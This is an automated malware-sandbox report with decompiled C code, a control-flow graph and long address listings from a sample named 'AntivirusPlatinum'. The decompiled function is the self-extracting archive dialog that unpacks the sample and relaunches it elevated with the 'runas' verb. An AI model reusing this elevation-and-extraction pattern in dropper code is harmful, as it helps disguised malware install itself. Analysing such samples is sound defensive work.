                                                                                                                                                      0x00410e79
                                                                                                                                                      0x00410e8d
                                                                                                                                                      0x00410e94
                                                                                                                                                      0x0041121e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0041121e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00410e94
                                                                                                                                                      0x00410e7b
                                                                                                                                                      0x00410e87
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00410e87
                                                                                                                                                      0x00410e5a
                                                                                                                                                      0x00411236
                                                                                                                                                      0x00411238
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00411238
                                                                                                                                                      0x00410dec
                                                                                                                                                      0x00410df3
                                                                                                                                                      0x00410dfa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00410e04
                                                                                                                                                      0x00410e11
                                                                                                                                                      0x00410e18
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00410e18
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00410d89
                                                                                                                                                      0x00410d89
                                                                                                                                                      0x00410d8c
                                                                                                                                                      0x00410d8e
                                                                                                                                                      0x00410d8e
                                                                                                                                                      0x00410d97
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00410d9a
                                                                                                                                                      0x00410da3
                                                                                                                                                      0x00410daa
                                                                                                                                                      0x00410dae
                                                                                                                                                      0x00410db1
                                                                                                                                                      0x00410db6
                                                                                                                                                      0x00410db9
                                                                                                                                                      0x00410db9
                                                                                                                                                      0x00410dbc
                                                                                                                                                      0x00410dc6
                                                                                                                                                      0x00410dc7
                                                                                                                                                      0x00410dc7
                                                                                                                                                      0x00410dca
                                                                                                                                                      0x00410dca
                                                                                                                                                      0x00410dcf
                                                                                                                                                      0x00410dcf
                                                                                                                                                      0x00410dd0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00410d8e

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e39889d3b9d423c40e8e9e1918b35b6cc5c2e3f1712bcc4791a5cff916639a1d
                                                                                                                                                      • Instruction ID: 2f23f26b4e860162697db71149469eb4a2c789a3ce5996a89fe4a76fa1262b3b
                                                                                                                                                      • Opcode Fuzzy Hash: e39889d3b9d423c40e8e9e1918b35b6cc5c2e3f1712bcc4791a5cff916639a1d
                                                                                                                                                      • Instruction Fuzzy Hash: DCD12370A00B449BDB349B35C8916EFB7E1AB45308F14483FE59AD7391D7BCA9C68B09
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 40cc24-40cc57 call 401200 call 40309d 5 40cc5d-40cc5e 0->5 6 40d04f-40d062 0->6 9 40cc60-40cc65 5->9 10 40cc6f-40cc71 5->10 7 40d073-40d07a 6->7 8 40d064-40d06d SendMessageA 6->8 12 40d08c-40d100 call 40ba36 GetDlgItem GetWindowRect MapWindowPoints SetMenu CreateWindowExA 7->12 13 40d07c-40d086 SendDlgItemMessageA 7->13 8->7 14 40cc67-40cc68 9->14 15 40ccce-40cce9 GetDlgItemTextA 9->15 11 40d335-40d339 10->11 33 40d102-40d109 SetMenu 12->33 34 40d10b-40d13a SetWindowPos DestroyWindow SendMessageA 12->34 13->12 19 40cca7-40ccad 14->19 20 40cc6a-40cc6d 14->20 17 40cd08-40cd0e 15->17 18 40cceb-40ccf1 15->18 22 40cd10-40cd1d 17->22 23 40cd22-40cd34 GetDlgItem 17->23 27 40ccf3 18->27 28 40ccfd 18->28 25 40ccc1-40cccc 19->25 26 40ccaf-40ccbf 19->26 20->10 21 40cc76-40cc8d call 4098f7 call 4027d8 20->21 35 40cc9f-40cca2 21->35 55 40cc8f-40cc99 SetDlgItemTextA 21->55 30 40cfe6-40cfec 22->30 31 40cd36-40cd55 SendMessageA * 2 23->31 32 40cd57-40cd79 SetFocus call 4058ff 23->32 36 40ccff-40cd06 EndDialog 25->36 26->25 26->35 27->28 28->36 38 40cff2-40cff8 30->38 39 40d2ab 30->39 31->32 51 40cd8b-40cda1 SetCurrentDirectoryA 32->51 52 40cd7b-40cd80 GetLastError 32->52 41 40d159-40d182 GetCurrentDirectoryA GetDlgItem 33->41 42 40d147-40d153 SendMessageA 34->42 43 40d13c-40d141 SendMessageA 34->43 35->11 36->35 38->39 45 40cffe-40d01c call 4098f7 SetDlgItemTextA 38->45 54 40d2b1-40d2be call 40bf99 39->54 47 40d184 41->47 48 40d18a-40d1c1 SetWindowTextA call 40aafc call 40ca95 41->48 42->41 43->42 65 40d023-40d02f 45->65 66 40d01e-40d021 45->66 47->48 75 40d1d1-40d1d7 48->75 76 40d1c3-40d1cc call 40bf99 48->76 59 40cda3-40cda8 GetLastError 51->59 60 40cdae-40cdb5 call 406ea5 51->60 57 40cd82-40cd85 52->57 58 40cd87 52->58 70 40d2c3-40d2ca 54->70 55->35 57->51 57->58 58->51 59->60 67 40cdaa 59->67 73 40ce25-40ce27 60->73 74 40cdb7-40cdbd 60->74 71 40d032-40d04a call 4098f7 * 2 MessageBoxA 65->71 66->71 67->60 77 40d2d6-40d2dc 70->77 78 40d2cc-40d2d0 KiUserCallbackDispatcher 70->78 106 40d333 71->106 86 40ce28-40ce2b 73->86 74->73 80 40cdbf-40cdc2 74->80 82 40d234-40d23a 75->82 83 40d1d9-40d1df 75->83 76->75 84 40d2f0-40d2f7 77->84 85 40d2de-40d2eb call 40307f * 2 77->85 78->77 90 40cdc4-40cdfd GetTickCount wsprintfA call 404ec3 call 4051d8 80->90 91 40ce3e-40ce40 80->91 88 40d2c0-40d2c2 82->88 89 40d240-40d254 call 40bf99 82->89 92 40d1e4-40d20f call 40a5e2 call 4098f7 call 40a5e2 83->92 94 40d2f9-40d2ff 84->94 95 40d31b-40d321 84->95 85->84 96 40ce31-40ce37 86->96 97 40cf4d-40cfb8 call 40b92f call 40307f * 3 call 40bf99 * 2 call 40b322 call 40bf99 86->97 88->70 122 40d256-40d25c 89->122 123 40d27e-40d287 89->123 132 40ce02-40ce07 90->132 99 40ce41-40ce49 91->99 152 40d211-40d217 92->152 94->95 104 40d301-40d30b 94->104 95->106 107 40d323-40d32d call 4098f7 SetDlgItemTextA 95->107 96->99 108 40ce39-40ce3c 96->108 165 40cfd8-40cfe0 call 40307f 97->165 166 40cfba-40cfc0 97->166 111 40cef0-40cf3a call 4098f7 wsprintfA call 40325c call 4098f7 MessageBoxA 99->111 112 40ce4f-40cecb GetModuleFileNameA wsprintfA ShellExecuteExA 99->112 117 40d315 PostMessageA 104->117 118 40d30d-40d313 SendMessageA 104->118 106->11 107->106 108->99 129 40cf40-40cf48 KiUserCallbackDispatcher 111->129 112->111 121 40cecd-40ceee WaitForInputIdle Sleep 112->121 117->95 118->95 121->129 122->123 130 40d25e-40d279 call 406d54 call 40a205 122->130 123->54 133 40d289-40d2a3 DialogBoxParamA 123->133 129->106 130->123 138 40ce18-40ce23 call 405074 132->138 139 40ce09-40ce12 GetLastError 132->139 133->54 140 40d2a5 133->140 138->86 139->138 145 40ce14 139->145 140->39 145->138 152->82 155 40d219-40d22f call 406d54 152->155 155->82 165->30 166->165 168 40cfc2-40cfc8 166->168 168->165 170 40cfca-40cfd3 call 40bf99 168->170 170->165
                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E0040CC24(void* __ecx, void* __edx, struct HWND__* _a4, struct HWND__* _a8, signed int _a11, struct HWND__* _a12, signed int _a15, intOrPtr _a16) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				struct tagPOINT _v20;
                                                                                                                                                      				struct _SHELLEXECUTEINFOA _v80;
                                                                                                                                                      				char _v1104;
                                                                                                                                                      				char _v2128;
                                                                                                                                                      				char _v2640;
                                                                                                                                                      				char _v5340;
                                                                                                                                                      				char _v5744;
                                                                                                                                                      				char _v13936;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t90;
                                                                                                                                                      				long _t91;
                                                                                                                                                      				long _t92;
                                                                                                                                                      				signed int _t106;
                                                                                                                                                      				int _t109;
                                                                                                                                                      				CHAR* _t114;
                                                                                                                                                      				signed int _t118;
                                                                                                                                                      				signed int _t128;
                                                                                                                                                      				signed int _t130;
                                                                                                                                                      				void* _t149;
                                                                                                                                                      				struct HWND__* _t152;
                                                                                                                                                      				signed int _t155;
                                                                                                                                                      				signed int _t157;
                                                                                                                                                      				signed int _t158;
                                                                                                                                                      				intOrPtr _t171;
                                                                                                                                                      				CHAR* _t172;
                                                                                                                                                      				int _t193;
                                                                                                                                                      				signed int _t201;
                                                                                                                                                      				long _t202;
                                                                                                                                                      				long _t203;
                                                                                                                                                      				long _t204;
                                                                                                                                                      				void* _t210;
                                                                                                                                                      				signed int _t214;
                                                                                                                                                      				void* _t223;
                                                                                                                                                      				intOrPtr _t224;
                                                                                                                                                      				intOrPtr _t225;
                                                                                                                                                      				struct HWND__* _t231;
                                                                                                                                                      				int _t233;
                                                                                                                                                      				void* _t235;
                                                                                                                                                      				struct HWND__* _t242;
                                                                                                                                                      				void* _t243;
                                                                                                                                                      
                                                                                                                                                      				_t230 = __edx;
                                                                                                                                                      				_t223 = __ecx;
                                                                                                                                                      				E00401200(0x366c);
                                                                                                                                                      				_t242 = _a4;
                                                                                                                                                      				E0040309D(__edx, _t242, _a8, _a12, _a16, "STARTDLG", 0, 0); // executed
                                                                                                                                                      				_t90 = _a8 - 0x110;
                                                                                                                                                      				if(_t90 == 0) {
                                                                                                                                                      					_t91 =  *0x4192d4; // 0x24025d
                                                                                                                                                      					 *0x419f80 = _t242;
                                                                                                                                                      					 *0x419f7c = _t242;
                                                                                                                                                      					__eflags = _t91;
                                                                                                                                                      					if(_t91 != 0) {
                                                                                                                                                      						SendMessageA(_t242, 0x80, 1, _t91);
                                                                                                                                                      					}
                                                                                                                                                      					_t92 =  *0x4192d0; // 0xec050b71
                                                                                                                                                      					__eflags = _t92;
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						SendDlgItemMessageA(_t242, 0x69, 0x172, 0, _t92); // executed
                                                                                                                                                      					}
                                                                                                                                                      					E0040BA36(_t230, __eflags, _t242);
                                                                                                                                                      					_a8 = GetDlgItem(_t242, 0x67);
                                                                                                                                                      					GetWindowRect(_a8,  &_v20);
                                                                                                                                                      					MapWindowPoints(0, _t242,  &_v20, 2);
                                                                                                                                                      					_t231 = SetMenu;
                                                                                                                                                      					SetMenu(_a8, 0);
                                                                                                                                                      					_t106 = CreateWindowExA(0, "RichEdit", 0x41259a, 0x50a10844, _v20.x, _v20.y, _v12 - _v20 + 1, _v8 - _v20.y + 1, _t242, 0x67,  *0x414c78, 0); // executed
                                                                                                                                                      					_a12 = _t106;
                                                                                                                                                      					__eflags = _t106;
                                                                                                                                                      					if(_t106 != 0) {
                                                                                                                                                      						_t231 = _a12;
                                                                                                                                                      						SetWindowPos(_t231, _a8, 0, 0, 0, 0, 0x203);
                                                                                                                                                      						DestroyWindow(_a8); // executed
                                                                                                                                                      						_a8 = _t231;
                                                                                                                                                      						_t109 = SendMessageA(_t242, 0x31, 0, 0);
                                                                                                                                                      						__eflags = _t109;
                                                                                                                                                      						if(_t109 != 0) {
                                                                                                                                                      							SendMessageA(_t231, 0x30, _t109, 0); // executed
                                                                                                                                                      						}
                                                                                                                                                      						SendMessageA(_t231, 0x435, 0, 0x400000);
                                                                                                                                                      					} else {
                                                                                                                                                      						SetMenu(_a8, 0x67);
                                                                                                                                                      					}
                                                                                                                                                      					GetCurrentDirectoryA(0x400,  &_v2128);
                                                                                                                                                      					_a12 = GetDlgItem(_t242, 0x65);
                                                                                                                                                      					_t114 = 0x419f92;
                                                                                                                                                      					__eflags =  *0x419f92; // 0x0
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						_t114 =  &_v2128;
                                                                                                                                                      					}
                                                                                                                                                      					SetWindowTextA(_a12, _t114); // executed
                                                                                                                                                      					E0040AAFC(_t223, __eflags, _a12); // executed
                                                                                                                                                      					 *0x41a814 = 0; // executed
                                                                                                                                                      					E0040CA95(0, _t230, _t231, _t242, __eflags, "C:\Users\hardz\Desktop\Endermanch@AntivirusPlatinum.exe", "C:\Users\hardz\Desktop\Endermanch@AntivirusPlatinum.exe", 0x41a818, 0x41a824); // executed
                                                                                                                                                      					__eflags =  *0x41a824;
                                                                                                                                                      					if( *0x41a824 > 0) {
                                                                                                                                                      						E0040BF99(_t230, _t242, _t242,  *0x41a818, 7); // executed
                                                                                                                                                      					}
                                                                                                                                                      					__eflags =  *0x41a814;
                                                                                                                                                      					if( *0x41a814 != 0) {
                                                                                                                                                      						L75:
                                                                                                                                                      						__eflags =  *0x41a824;
                                                                                                                                                      						if( *0x41a824 <= 0) {
                                                                                                                                                      							_t233 = 1;
                                                                                                                                                      							__eflags = 1;
                                                                                                                                                      							L85:
                                                                                                                                                      							__eflags =  *0x419f8c - 2;
                                                                                                                                                      							if( *0x419f8c == 2) {
                                                                                                                                                      								EnableWindow(_a12, 0);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *0x419f88; // 0x0
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								E0040307F(_t242, 0x66, 0);
                                                                                                                                                      								E0040307F(_t242, 0x65, 0);
                                                                                                                                                      							}
                                                                                                                                                      							_t118 =  *0x419f8c; // 0x2
                                                                                                                                                      							__eflags = _t118;
                                                                                                                                                      							if(_t118 != 0) {
                                                                                                                                                      								__eflags =  *0x419f78; // 0x2
                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                      									_push(0);
                                                                                                                                                      									_push(_t233);
                                                                                                                                                      									_push(0x111);
                                                                                                                                                      									_push(_t242);
                                                                                                                                                      									__eflags = _t118 - _t233;
                                                                                                                                                      									if(_t118 != _t233) {
                                                                                                                                                      										PostMessageA();
                                                                                                                                                      									} else {
                                                                                                                                                      										SendMessageA();
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *0x419f68; // 0x0
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								SetDlgItemTextA(_t242, _t233, E004098F7(0x7d));
                                                                                                                                                      							}
                                                                                                                                                      							L96:
                                                                                                                                                      							return _t233;
                                                                                                                                                      						}
                                                                                                                                                      						E0040BF99(_t230, _t242, _t242,  *0x41a818, 0); // executed
                                                                                                                                                      						_t128 =  *0x41a81c;
                                                                                                                                                      						__eflags = _t128;
                                                                                                                                                      						if(_t128 != 0) {
                                                                                                                                                      							__eflags =  *0x419f8c; // 0x2
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_t224 =  *0x418ecc; // 0x0
                                                                                                                                                      								E00406D54(_t224,  *0x414c74, _a8, _t128);
                                                                                                                                                      								E0040A205( *0x41a81c);
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_t233 = 1;
                                                                                                                                                      						__eflags =  *0x419f8c - _t233; // 0x2
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							L83:
                                                                                                                                                      							E0040BF99(_t230, _t242, _t242,  *0x41a818, _t233);
                                                                                                                                                      							goto L85;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t130 = DialogBoxParamA( *0x414c74, "LICENSEDLG", 0, E0040CB2B, 0); // executed
                                                                                                                                                      							__eflags = _t130;
                                                                                                                                                      							if(_t130 != 0) {
                                                                                                                                                      								goto L83;
                                                                                                                                                      							}
                                                                                                                                                      							 *0x419f78 = 1;
                                                                                                                                                      							L82:
                                                                                                                                                      							_push(_t233);
                                                                                                                                                      							L45:
                                                                                                                                                      							EndDialog(_t242, ??); // executed
                                                                                                                                                      							goto L96;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_v13936 = 0;
                                                                                                                                                      						_t235 = 0x96;
                                                                                                                                                      						do {
                                                                                                                                                      							E0040A5E2( &_v13936, " ");
                                                                                                                                                      							E0040A5E2( &_v13936, E004098F7(_t235));
                                                                                                                                                      							_t235 = _t235 + 1;
                                                                                                                                                      							__eflags = _t235 - 0x9b;
                                                                                                                                                      						} while (_t235 <= 0x9b);
                                                                                                                                                      						__eflags =  *0x419f8c; // 0x2
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							_t225 =  *0x418ecc; // 0x0
                                                                                                                                                      							E00406D54(_t225,  *0x414c74, _a8,  &_v13936);
                                                                                                                                                      						}
                                                                                                                                                      						goto L75;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(_t90 != 1) {
                                                                                                                                                      					L5:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t149 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t149 == 0) {
                                                                                                                                                      					GetDlgItemTextA(_t242, 0x65,  &_v1104, 0x400);
                                                                                                                                                      					__eflags =  *0x419f70; // 0x0
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						__eflags =  *0x419f68; // 0x0
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							_t152 = GetDlgItem(_t242, 0x67);
                                                                                                                                                      							_a8 = _t152;
                                                                                                                                                      							__eflags =  *0x419f74; // 0x0
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								SendMessageA(_t152, 0xb1, 0, 0xffffffff);
                                                                                                                                                      								SendMessageA(_a8, 0xc2, 0, 0x41259a);
                                                                                                                                                      							}
                                                                                                                                                      							SetFocus(_a8);
                                                                                                                                                      							_a11 = 0;
                                                                                                                                                      							_t155 = E004058FF(0, _t242,  &_v1104, 0, 0); // executed
                                                                                                                                                      							__eflags = _t155;
                                                                                                                                                      							if(_t155 != 0) {
                                                                                                                                                      								L25:
                                                                                                                                                      								_t157 = SetCurrentDirectoryA( &_v1104); // executed
                                                                                                                                                      								__eflags = _t157;
                                                                                                                                                      								_a15 = _t157 != 0;
                                                                                                                                                      								__eflags = _a15;
                                                                                                                                                      								if(_a15 == 0) {
                                                                                                                                                      									_t203 = GetLastError();
                                                                                                                                                      									__eflags = _t203 - 5;
                                                                                                                                                      									if(_t203 == 5) {
                                                                                                                                                      										_a11 = 1;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								_t158 = E00406EA5();
                                                                                                                                                      								__eflags = _t158;
                                                                                                                                                      								if(_t158 == 0) {
                                                                                                                                                      									L35:
                                                                                                                                                      									_t233 = 1;
                                                                                                                                                      									__eflags = 1;
                                                                                                                                                      									L36:
                                                                                                                                                      									__eflags = _a15;
                                                                                                                                                      									if(_a15 != 0) {
                                                                                                                                                      										E0040B92F(_t242,  &_v1104); // executed
                                                                                                                                                      										 *0x419f6c = _t233;
                                                                                                                                                      										E0040307F(_t242, 0x66, 0);
                                                                                                                                                      										E0040307F(_t242, 0x65, 0);
                                                                                                                                                      										E0040307F(_t242, _t233, 0);
                                                                                                                                                      										E0040BF99(_t230, _t242, _t242,  *0x41a818, 5);
                                                                                                                                                      										E0040BF99(_t230, _t242, _t242,  *0x41a818, 2);
                                                                                                                                                      										E0040B322(_t230, __eflags, "C:\Users\hardz\Desktop\Endermanch@AntivirusPlatinum.exe", "C:\Users\hardz\Desktop\Endermanch@AntivirusPlatinum.exe"); // executed
                                                                                                                                                      										E0040BF99(_t230, _t242, _t242,  *0x41a818, 6);
                                                                                                                                                      										__eflags =  *0x419f78; // 0x2
                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                      											__eflags =  *0x419f74; // 0x0
                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                      												__eflags =  *0x41a828;
                                                                                                                                                      												if( *0x41a828 == 0) {
                                                                                                                                                      													E0040BF99(_t230, _t242, 0,  *0x41a818, 4); // executed
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										E0040307F(_t242, _t233, _t233);
                                                                                                                                                      										 *0x419f6c = 0;
                                                                                                                                                      										goto L51;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *0x419f91; // 0x0
                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                      										_a11 = 0;
                                                                                                                                                      									}
                                                                                                                                                      									L40:
                                                                                                                                                      									__eflags = _a11;
                                                                                                                                                      									__eflags = _t158 & 0xffffff00 | _a11 == 0x00000000;
                                                                                                                                                      									if((_t158 & 0xffffff00 | _a11 == 0x00000000) != 0) {
                                                                                                                                                      										L43:
                                                                                                                                                      										wsprintfA( &_v2640, "\"%s\"\n%s",  &_v1104, E004098F7(0x82));
                                                                                                                                                      										E0040325C(0x414c7c, _t233);
                                                                                                                                                      										MessageBoxA(_t242,  &_v2640, E004098F7(0x7e), 0x30);
                                                                                                                                                      										 *0x419f74 =  *0x419f74 + 1;
                                                                                                                                                      										__eflags =  *0x419f74;
                                                                                                                                                      										L44:
                                                                                                                                                      										_push(0);
                                                                                                                                                      										goto L45;
                                                                                                                                                      									}
                                                                                                                                                      									GetModuleFileNameA(0,  &_v2128, 0x400);
                                                                                                                                                      									wsprintfA( &_v5340, "-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"",  &_v1104, 0x41a792, 0x41a392);
                                                                                                                                                      									_v80.lpFile =  &_v2128;
                                                                                                                                                      									_v80.lpParameters =  &_v5340;
                                                                                                                                                      									_t243 = _t243 + 0x14;
                                                                                                                                                      									_v80.cbSize = 0x3c;
                                                                                                                                                      									_v80.fMask = 0x40;
                                                                                                                                                      									_v80.hwnd = _t242;
                                                                                                                                                      									_v80.lpVerb = "runas";
                                                                                                                                                      									_v80.lpDirectory = 0x412340;
                                                                                                                                                      									_v80.nShow = _t233;
                                                                                                                                                      									_v80.hInstApp = 0;
                                                                                                                                                      									_t193 = ShellExecuteExA( &_v80);
                                                                                                                                                      									__eflags = _t193;
                                                                                                                                                      									if(_t193 == 0) {
                                                                                                                                                      										goto L43;
                                                                                                                                                      									}
                                                                                                                                                      									WaitForInputIdle(_v80.hProcess, 0x2710);
                                                                                                                                                      									Sleep(0x1f4);
                                                                                                                                                      									 *0x41a828 = _v80.hProcess;
                                                                                                                                                      									goto L44;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags =  *0x419f91; // 0x0
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									goto L35;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _a15;
                                                                                                                                                      								if(_a15 == 0) {
                                                                                                                                                      									_t233 = 1;
                                                                                                                                                      									__eflags = 1;
                                                                                                                                                      									goto L40;
                                                                                                                                                      								}
                                                                                                                                                      								wsprintfA( &_v2128, "__tmp_rar_sfx_access_check_%u", GetTickCount());
                                                                                                                                                      								_t243 = _t243 + 0xc;
                                                                                                                                                      								E00404EC3( &_v5744);
                                                                                                                                                      								_t233 = 1;
                                                                                                                                                      								_t201 = E004051D8( &_v5744,  &_v2128, 0, 1); // executed
                                                                                                                                                      								_a15 = _t201;
                                                                                                                                                      								__eflags = _t201;
                                                                                                                                                      								if(_t201 == 0) {
                                                                                                                                                      									_t202 = GetLastError();
                                                                                                                                                      									__eflags = _t202 - 5;
                                                                                                                                                      									if(_t202 == 5) {
                                                                                                                                                      										_a11 = 1;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								_t158 = E00405074(0,  &_v5744);
                                                                                                                                                      								goto L36;
                                                                                                                                                      							}
                                                                                                                                                      							_t204 = GetLastError();
                                                                                                                                                      							__eflags = _t204 - 5;
                                                                                                                                                      							if(_t204 == 5) {
                                                                                                                                                      								L24:
                                                                                                                                                      								_a11 = 1;
                                                                                                                                                      								goto L25;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _t204 - 3;
                                                                                                                                                      							if(_t204 != 3) {
                                                                                                                                                      								goto L25;
                                                                                                                                                      							}
                                                                                                                                                      							goto L24;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *0x419f78 = 2;
                                                                                                                                                      							_t233 = 1;
                                                                                                                                                      							L51:
                                                                                                                                                      							__eflags =  *0x419f74; // 0x0
                                                                                                                                                      							if(__eflags <= 0) {
                                                                                                                                                      								goto L82;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *0x419f78; // 0x2
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								goto L82;
                                                                                                                                                      							}
                                                                                                                                                      							 *0x419f70 = _t233;
                                                                                                                                                      							SetDlgItemTextA(_t242, _t233, E004098F7(0x7d));
                                                                                                                                                      							_t171 =  *0x414c7c; // 0x0
                                                                                                                                                      							__eflags = _t171 - 9;
                                                                                                                                                      							if(_t171 != 9) {
                                                                                                                                                      								__eflags = _t171 - 3;
                                                                                                                                                      								_t222 = ((_t171 != 0x00000003) - 0x00000001 & 0x00000005) + 0x7f;
                                                                                                                                                      								__eflags = ((_t171 != 0x00000003) - 0x00000001 & 0x00000005) + 0x7f;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t54 = _t171 + 0x7a; // 0x7a
                                                                                                                                                      								_t222 = _t54;
                                                                                                                                                      							}
                                                                                                                                                      							_t172 = E004098F7(0x7e);
                                                                                                                                                      							MessageBoxA(_t242, E004098F7(_t222), _t172, 0x30);
                                                                                                                                                      							goto L96;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						__eflags =  *0x419f68; // 0x0
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							 *0x419f78 = 2;
                                                                                                                                                      						}
                                                                                                                                                      						_push(1);
                                                                                                                                                      						L16:
                                                                                                                                                      						EndDialog(_t242, ??);
                                                                                                                                                      						L8:
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t210 = _t149 - 1;
                                                                                                                                                      				if(_t210 == 0) {
                                                                                                                                                      					__eflags =  *0x419f6c; // 0x0
                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                      						L11:
                                                                                                                                                      						 *0x419f78 = 2;
                                                                                                                                                      						_push(0);
                                                                                                                                                      						goto L16;
                                                                                                                                                      					}
                                                                                                                                                      					 *0x419f78 = 1;
                                                                                                                                                      					__eflags =  *0x419f74; // 0x0
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						goto L8;
                                                                                                                                                      					}
                                                                                                                                                      					goto L11;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t210 == 0x64) {
                                                                                                                                                      					_t214 = E004027D8(_t242, E004098F7(0x64),  &_v1104);
                                                                                                                                                      					__eflags = _t214;
                                                                                                                                                      					if(_t214 != 0) {
                                                                                                                                                      						SetDlgItemTextA(_t242, 0x65,  &_v1104);
                                                                                                                                                      					}
                                                                                                                                                      					goto L8;
                                                                                                                                                      				}
                                                                                                                                                      				goto L5;
                                                                                                                                                      			}















































                                                                                                                                                      0x0040cc24
                                                                                                                                                      0x0040cc24
                                                                                                                                                      0x0040cc2c
                                                                                                                                                      0x0040cc33
                                                                                                                                                      0x0040cc4a
                                                                                                                                                      0x0040cc52
                                                                                                                                                      0x0040cc57
                                                                                                                                                      0x0040d04f
                                                                                                                                                      0x0040d054
                                                                                                                                                      0x0040d05a
                                                                                                                                                      0x0040d060
                                                                                                                                                      0x0040d062
                                                                                                                                                      0x0040d06d
                                                                                                                                                      0x0040d06d
                                                                                                                                                      0x0040d073
                                                                                                                                                      0x0040d078
                                                                                                                                                      0x0040d07a
                                                                                                                                                      0x0040d086
                                                                                                                                                      0x0040d086
                                                                                                                                                      0x0040d08d
                                                                                                                                                      0x0040d09b
                                                                                                                                                      0x0040d0a5
                                                                                                                                                      0x0040d0b3
                                                                                                                                                      0x0040d0b9
                                                                                                                                                      0x0040d0c3
                                                                                                                                                      0x0040d0f5
                                                                                                                                                      0x0040d0fb
                                                                                                                                                      0x0040d0fe
                                                                                                                                                      0x0040d100
                                                                                                                                                      0x0040d10b
                                                                                                                                                      0x0040d11b
                                                                                                                                                      0x0040d124
                                                                                                                                                      0x0040d12f
                                                                                                                                                      0x0040d132
                                                                                                                                                      0x0040d138
                                                                                                                                                      0x0040d13a
                                                                                                                                                      0x0040d141
                                                                                                                                                      0x0040d141
                                                                                                                                                      0x0040d153
                                                                                                                                                      0x0040d102
                                                                                                                                                      0x0040d107
                                                                                                                                                      0x0040d107
                                                                                                                                                      0x0040d165
                                                                                                                                                      0x0040d174
                                                                                                                                                      0x0040d177
                                                                                                                                                      0x0040d17c
                                                                                                                                                      0x0040d182
                                                                                                                                                      0x0040d184
                                                                                                                                                      0x0040d184
                                                                                                                                                      0x0040d18e
                                                                                                                                                      0x0040d197
